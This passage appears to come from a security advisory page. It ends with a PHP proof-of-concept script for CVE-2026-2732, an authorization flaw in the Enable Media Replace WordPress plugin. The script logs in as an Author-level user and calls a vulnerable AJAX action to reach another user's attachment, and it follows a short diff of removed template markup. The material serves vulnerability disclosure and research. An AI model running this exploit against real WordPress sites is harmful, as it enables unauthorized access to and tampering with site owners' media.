-				<?php } else { ?>
-
-				<?php }
-			} ?>
-    </div>
-    <style>
-	    .envira-emr-button-wrap {
-		text-align: center;
-	}
-	.button-envira-emr {
-		background-color: #7cc048 !important;
-		border: none !important;
-		color: rgb(255,255,255) !important;
-		font-size: 21px !important;
-	}
-	.button-envira-emr:hover {
-		background-color: #95dc5e !important;
-	}
-    </style>
-	<?php endif; // envira ?>
--->
-
 </section>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2732 - Enable Media Replace <= 4.1.7 - Improper Authorization to Authenticated (Author+) Arbitrary Attachment Change via Background Replace

$target_url = 'https://vulnerable-site.com';
$username = 'author_user';
$password = 'author_password';
$target_attachment_id = 123; // ID of attachment to replace

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
$response = curl_exec($ch);

// Step 2: Trigger the vulnerable load function to get interface
$post_data = [
    'action' => 'emr_remove_background_load',
    'attachment_id' => $target_attachment_id
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

// The response should contain the background removal interface
// This demonstrates the unauthorized access to another user's attachment
// Note: Full exploitation requires a valid removal key from ShortPixel service
// which is not included in this PoC

echo "Vulnerable endpoint accessed. Response length: " . strlen($response) . "\n";
if (strpos($response, 'emr-remove-background') !== false) {
    echo "SUCCESS: Unauthorized access to attachment ID $target_attachment_id confirmed.\n";
}

curl_close($ch);
unlink('cookies.txt');

?>
